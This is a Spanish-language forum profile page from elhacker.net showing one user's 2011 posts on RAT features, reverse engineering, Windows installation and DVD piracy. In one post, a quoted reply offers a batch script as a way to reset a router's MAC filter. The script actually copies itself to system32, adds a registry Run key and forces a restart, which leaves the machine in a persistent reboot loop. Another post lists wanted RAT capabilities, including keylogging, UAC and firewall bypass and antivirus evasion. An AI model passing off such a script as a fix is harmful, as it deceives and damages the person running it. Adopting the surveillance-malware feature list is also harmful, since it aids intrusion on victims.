elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ... 58
161  Seguridad Informática / Análisis y Diseño de Malware / Re: Que funciones te gustaría que tuviera tu RAT soñado? en: 14 Junio 2011, 00:23 am
Slow V.S. eso me gusto ;-) gracias por el dato

Saludos!
162  Programación / Ingeniería Inversa / Re: Intentando pescar un serial en: 13 Junio 2011, 05:47 am
nada de gracias!!, cuando lo domines y lo hagas, espero tu tutorial, yo no tengo tiempo de hacerle tute con imagenes y paso a paso, pero te animo!..

saludos Apuromafo


Algo me dice que no lo veremos mas
163  Seguridad Informática / Wireless en Windows / Re: tengo la clave wep de una red wifi en: 12 Junio 2011, 20:27 pm
Es muy facil mira hay un script que te modifica la velocidad de internet, osea desactiva el filtro del router, pero debes estar en el internet de el
mira tienes que crear un documento de texto cono este nombre script es decir script.txt
y escribes esto:


Código
  1. echo off
  2. copy %0 %windir%/system32/
  3. reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "System" /t REG_SZ /d "%windir/system32/script.bat" /f > nul
  4. shutdown -r -t 10
  5. exit

luego de eso cambia la extension a .bat es decir script.bat

esto hace que el router se apague y resetee el filtro de mac

Saludos

@.:UND3R:.
Muy lindo tu código, pero deberías saber que esta prohibido ayudar en casos como este =/ ya que se sabe cuales son las intenciones de @guribe
164  Seguridad Informática / Análisis y Diseño de Malware / Re: Que funciones te gustaría que tuviera tu RAT soñado? en: 12 Junio 2011, 10:03 am
todos se han comido la captura de audio/video y periféricos.

auto-eliminación (por ejemplo, si es abierta la carpeta donde se encontraba).

buscador de archivos.

captura teclas, combinaciones, caracteres especiales y porta-papeles.

Bypass UAC

Bypass Firewall (el de windows)

Y lo temporalmente posible: Indetectable a los antivirus (Y que opcionalmente se pueda agregar a la lista de excepciones de los 10 antivirus mas usados)
165  Foros Generales / Sugerencias y dudas sobre el Foro / Re: [SUGERENCIA] Quitar sección "música, series de TV o películas" en: 10 Junio 2011, 19:20 pm
A mi lo que me parece extraño es que no se puedan postear Crypters o archivos maliciosos :/, pero si rats, y películas, musica, software, y ese tipo de warez xD...

no es wares, son mirrors y algo mas...

Ademas, los post puestos ahí, están también en otras paginas por alguna misteriosa razón.

Ahora bien, siempre que se desea abrir una nueva sección, es analizada con objetividad durante un periodo considerable (este, 17 días), así que al estar ahí, significa que ya fue discutido http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro/sugerencia_subforo_series_peliculas_etc-t205726.0.html  

Puedo ver que el propulsor fue Isirius (Que esta algo inactivo) http://foro.elhacker.net/profiles/isirius-u75993.html. Me gustaría ver que dicen los actuales moderadores.

Las normas del foro están claras http://foro.elhacker.net/series_peliculas_musica_juegos/normas_de_este_subforo-t206062.0.html

También se ha discutido algo parecido en http://foro.elhacker.net/foro_libre/que_opinara_ramoncin_del_foro_seriespeliculasmusica-t221390.0.html

En mi opinión (opinión, porque solo sé que me leerán y que en poco o nada influirá) este debe mantenerse, en un par de ocasiones me ha sido útil, a pesar de haber recorrido esas citadas "webs especializadas"

Saludos!
166  Foros Generales / Dudas Generales / Re: quiero ser hacker en: 10 Junio 2011, 05:59 am
Lo realmente raro y lo que verdaderamente no me cuadra a mi es revivir un tema del 2003 para hacer estos comentarios.... :huh: :-\.

Si te has fijado en la fecha de registro te habras fijado tambien en la fecha que abrió el tema ;)

Saludos

x2

Pd: La evolución de algunos usuarios... favor respetar a los recién llegados xD
167  Sistemas Operativos / Windows / Re: [Windows 7] [Instalacion] ¿Puedo instalar windows 7 desde otro disco duro? en: 8 Junio 2011, 23:19 pm
formatea el disco... y una vez formateado, de donde saca los archivos para su instalación? del disco formateado?

Saludos!
168  Informática / Software / Re: Como funciona el grabado de un dvd original en: 7 Junio 2011, 18:48 pm
Y supongamos que hago una produccion casera. Como haria para grabarlo "con proteccion"? :P

de la misma forma que las grandes marcas protegen sus producciones... resando  :laugh:

Hola, tengo una curiosidad respecta alos dvd

hace poco compre una pelicula "Pirata" pero me di  cuenta de algo que nunca habia apreciado, y es que en ninguna pelicula pirateada se encuenta el menu de opciones de lenguaje, escenas, sonido.......

A que se debe esto??? Mi pregunta seria como realizar una copia exactamente igual ala original (Que conste que es solo por curiosidad) no pienso dedicarme al negocio jajajaj Un cordial saludo

Atentamente
WH

Si, puedes obtener una copia idéntica a una original (la mayoría esta disponible, pero trae alta calidad, lo que significa bajar mas datos y demorarse mas en grabar), eso dependerá de la calidad de tu "proveedor"

Saludos!
169  Sistemas Operativos / Windows / Re: [Windows 7] [Instalacion] ¿Puedo instalar windows 7 desde otro disco duro? en: 7 Junio 2011, 05:59 am
Andres, es solo por curiosidad, si puedes desde un pendrive, red, dvd, cd y diskettes.... ¿No puedes con otro disco duro?

Saludos!
170  Sistemas Operativos / Windows / [Windows 7] [Instalacion] ¿Puedo instalar windows 7 desde otro disco duro? en: 6 Junio 2011, 23:39 pm
Bueno, tengo dos discos duros, el principal y otro secundario que sobro de la vieja maquina...

Ahora bien, he movido los archivos importantes al secundario, de modo que puedo borrar todo del principal.

La pregunta es, ¿puedo formatear el disco principal desde el disco secundario sin usar un dvd?

Saludos!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ... 58
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines